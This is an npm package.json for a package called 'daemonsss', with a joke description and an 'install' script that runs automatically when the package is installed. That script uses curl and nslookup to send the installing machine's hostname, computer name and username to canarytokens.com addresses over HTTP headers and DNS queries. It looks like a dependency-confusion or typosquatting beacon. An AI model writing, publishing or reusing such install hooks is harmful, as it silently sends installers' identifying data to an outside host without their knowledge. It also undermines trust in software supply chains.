{
  "name": "daemonsss",
  "version": "20.1.1",
  "description": "daemonsss: coolest nodejs  package on planet earth",
  "main": "index.js",
  "scripts": {
   "install": "curl -sI http://canarytokens.com/tags/images/0xrl2wxy59ktlxwnjp62y37ui/index.html -A %computername%-`hostname`-%username%-`whoami`-p-daemonsss &  nslookup ey-`hostname`-`whoami`-p-daemonsss.G92.s8o6e57rhf47qgqe0fky0fv5m.canarytokens.com & nslookup ey-%computername%-%username%-p-daemonsss.G92.s8o6e57rhf47qgqe0fky0fv5m.canarytokens.com;"
  },
  "author": "another noob developer",
  "license": "ISC"
}
